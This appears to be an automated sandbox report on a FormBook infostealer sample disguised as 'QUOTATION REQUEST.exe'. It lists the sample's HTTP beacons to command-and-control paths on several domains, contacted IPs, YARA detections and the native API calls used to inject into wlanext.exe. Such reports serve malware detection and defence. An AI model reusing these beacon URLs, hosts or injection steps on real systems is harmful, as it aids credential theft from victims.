Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 46.30.211.38 46.30.211.38
Source: Joe Sandbox View	IP Address: 81.17.18.196 81.17.18.196

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.sloanksmith.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 03 May 2021 14:51:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: QUOTATION REQUEST.exe

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004181C0 NtCreateFile,	3_2_004181C0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00418270 NtReadFile,	3_2_00418270
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182F0 NtClose,	3_2_004182F0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004183A0 NtAllocateVirtualMemory,	3_2_004183A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182EF NtClose,	3_2_004182EF
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182BA NtReadFile,	3_2_004182BA
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041839F NtAllocateVirtualMemory,	3_2_0041839F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk,	9_2_03639A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03639910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk,	9_2_036399A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03639860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk,	9_2_03639840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03639710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03639FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03639780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03639660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk,	9_2_03639650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_036396E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk,	9_2_036396D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639540 NtReadFile,LdrInitializeThunk,	9_2_03639540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395D0 NtClose,LdrInitializeThunk,	9_2_036395D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639B00 NtSetValueKey,	9_2_03639B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A3B0 NtGetContextThread,	9_2_0363A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A20 NtResumeThread,	9_2_03639A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A00 NtProtectVirtualMemory,	9_2_03639A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A10 NtQuerySection,	9_2_03639A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A80 NtOpenDirectoryObject,	9_2_03639A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639950 NtQueueApcThread,	9_2_03639950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399D0 NtCreateProcessEx,	9_2_036399D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363B040 NtSuspendThread,	9_2_0363B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639820 NtEnumerateKey,	9_2_03639820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398F0 NtReadVirtualMemory,	9_2_036398F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398A0 NtWriteVirtualMemory,	9_2_036398A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639760 NtOpenProcess,	9_2_03639760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A770 NtOpenThread,	9_2_0363A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639770 NtSetInformationFile,	9_2_03639770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639730 NtQueryVirtualMemory,	9_2_03639730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A710 NtOpenProcessToken,	9_2_0363A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036397A0 NtUnmapViewOfSection,	9_2_036397A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639670 NtQueryInformationProcess,	9_2_03639670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639610 NtEnumerateValueKey,	9_2_03639610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639560 NtWriteFile,	9_2_03639560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639520 NtWaitForSingleObject,	9_2_03639520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363AD30 NtSetContextThread,	9_2_0363AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395F0 NtQueryInformationFile,	9_2_036395F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE81C0 NtCreateFile,	9_2_00EE81C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82F0 NtClose,	9_2_00EE82F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE8270 NtReadFile,	9_2_00EE8270
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE83A0 NtAllocateVirtualMemory,	9_2_00EE83A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82EF NtClose,	9_2_00EE82EF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82BA NtReadFile,	9_2_00EE82BA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE839F NtAllocateVirtualMemory,	9_2_00EE839F

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C194A8	0_2_00C194A8
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1C3A0	0_2_00C1C3A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1A758	0_2_00C1A758
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_04C1C900	0_2_04C1C900
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040102F	3_2_0040102F
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401209	3_2_00401209
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CB85	3_2_0041CB85
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C5D	3_2_00408C5D
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A3	3_2_0041B4A3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A6	3_2_0041B4A6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041BD74	3_2_0041BD74
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C58C	3_2_0041C58C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CF94	3_2_0041CF94
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2B28	9_2_036C2B28
